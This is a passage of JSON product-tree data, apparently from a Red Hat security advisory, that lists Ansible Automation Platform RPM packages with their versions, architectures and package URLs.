"name": "python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bjwt_consumer@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Boauth2_provider@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Brbac@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bredis_client@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bresource_registry@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Brest_filters@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"product_id": "automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller@1.2.11-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"product_id": "automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-base@1.2.11-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"product_id": "automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-base-services@1.2.11-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"product_id": "automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-event-stream-services@1.2.11-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"product_id": "automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-worker-services@1.2.11-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-hub-0:4.11.12-1.el9ap.noarch",
"product": {
"name": "automation-hub-0:4.11.12-1.el9ap.noarch",
"product_id": "automation-hub-0:4.11.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-hub@4.11.12-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"product": {
"name": "python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"product_id": "python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-galaxy-ng@4.11.12-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"product": {
"name": "automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"product_id": "automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-platform-ui@2.6.12-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"product": {
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"product_id": "python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulpcore@3.49.66-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"product": {
"name": "python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"product_id": "python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-daphne@4.2.2-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"product": {
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"product_id": "python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pyasn1@0.6.4-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "receptorctl-0:1.6.7-1.el9ap.noarch",
"product": {
"name": "receptorctl-0:1.6.7-1.el9ap.noarch",
"product_id": "receptorctl-0:1.6.7-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptorctl@1.6.7-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"product_id": "automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.7.15-2.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.7.15-2.el9ap.noarch",
"product": {
"name": "automation-controller-server-0:4.7.15-2.el9ap.noarch",
"product_id": "automation-controller-server-0:4.7.15-2.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.7.15-2.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"product_id": "automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.7.15-2.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"product": {
"name": "python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"product_id": "python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-tox-ansible@26.7.1-1.el10ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"product": {
"name": "ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"product_id": "ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-dev-tools%2Bserver@26.7.2-1.el10ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"product": {
"name": "ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"product_id": "ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-dev-tools@26.7.2-1.el10ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "receptorctl-0:1.6.7-1.el10ap.noarch",
"product": {
"name": "receptorctl-0:1.6.7-1.el10ap.noarch",
"product_id": "receptorctl-0:1.6.7-1.el10ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptorctl@1.6.7-1.el10ap?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-dev-tools-0:26.7.2-1.el9ap.src",
"product": {
"name": "ansible-dev-tools-0:26.7.2-1.el9ap.src",
"product_id": "ansible-dev-tools-0:26.7.2-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-dev-tools@26.7.2-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"product": {
"name": "python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"product_id": "python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-tox-ansible@26.7.1-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-0:2.6.20260804-1.el9ap.src",
"product": {
"name": "automation-gateway-0:2.6.20260804-1.el9ap.src",
"product_id": "automation-gateway-0:2.6.20260804-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway@2.6.20260804-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"product": {
"name": "python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"product_id": "python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base@2.6.20260804-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-0:1.2.11-1.el9ap.src",
"product": {
"name": "automation-eda-controller-0:1.2.11-1.el9ap.src",
"product_id": "automation-eda-controller-0:1.2.11-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller@1.2.11-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-hub-0:4.11.12-1.el9ap.src",
"product": {
"name": "automation-hub-0:4.11.12-1.el9ap.src",
"product_id": "automation-hub-0:4.11.12-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-hub@4.11.12-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"product": {
"name": "python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"product_id": "python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-galaxy-ng@4.11.12-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-platform-ui-0:2.6.12-1.el9ap.src",
"product": {
"name": "automation-platform-ui-0:2.6.12-1.el9ap.src",
"product_id": "automation-platform-ui-0:2.6.12-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-platform-ui@2.6.12-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.src",
"product": {
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.src",
"product_id": "aap-metrics-utility-0:0.7.6-3.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.7.6-3.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"product": {
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"product_id": "python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulpcore@3.49.66-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-daphne-0:4.2.2-1.el9ap.src",
"product": {
"name": "python3.12-daphne-0:4.2.2-1.el9ap.src",
"product_id": "python3.12-daphne-0:4.2.2-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-daphne@4.2.2-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el9ap.src",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.src",
"product_id": "python3.12-pillow-0:12.3.0-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"product": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"product_id": "automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.17-2.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"product": {
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"product_id": "python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pyasn1@0.6.4-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el9ap.src",
"product": {
"name": "receptor-0:1.6.7-1.el9ap.src",
"product_id": "receptor-0:1.6.7-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.7.15-2.el9ap.src",
"product": {
"name": "automation-controller-0:4.7.15-2.el9ap.src",
"product_id": "automation-controller-0:4.7.15-2.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.7.15-2.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-tox-ansible-0:26.7.1-1.el10ap.src",
"product": {
"name": "python-tox-ansible-0:26.7.1-1.el10ap.src",
"product_id": "python-tox-ansible-0:26.7.1-1.el10ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-tox-ansible@26.7.1-1.el10ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-dev-tools-0:26.7.2-1.el10ap.src",
"product": {
"name": "ansible-dev-tools-0:26.7.2-1.el10ap.src",
"product_id": "ansible-dev-tools-0:26.7.2-1.el10ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-dev-tools@26.7.2-1.el10ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el10ap.src",
"product": {
"name": "receptor-0:1.6.7-1.el10ap.src",
"product_id": "receptor-0:1.6.7-1.el10ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el10ap?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"product_id": "aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.7.6-3.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"product_id": "python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"product": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"product_id": "automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.17-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"product_id": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.17-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.17-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.17-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el9ap.x86_64",
"product": {
"name": "receptor-0:1.6.7-1.el9ap.x86_64",
"product_id": "receptor-0:1.6.7-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"product_id": "receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"product_id": "receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.7.15-2.el9ap.x86_64",
"product": {
"name": "automation-controller-0:4.7.15-2.el9ap.x86_64",
"product_id": "automation-controller-0:4.7.15-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.7.15-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.7.15-2.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el10ap.x86_64",
"product": {
"name": "receptor-0:1.6.7-1.el10ap.x86_64",
"product_id": "receptor-0:1.6.7-1.el10ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el10ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"product_id": "receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el10ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"product_id": "receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el10ap?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.7.6-3.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"product_id": "python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"product_id": "automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.17-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"product_id": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.17-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.17-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.17-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el9ap.ppc64le",
"product": {
"name": "receptor-0:1.6.7-1.el9ap.ppc64le",
"product_id": "receptor-0:1.6.7-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"product_id": "receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
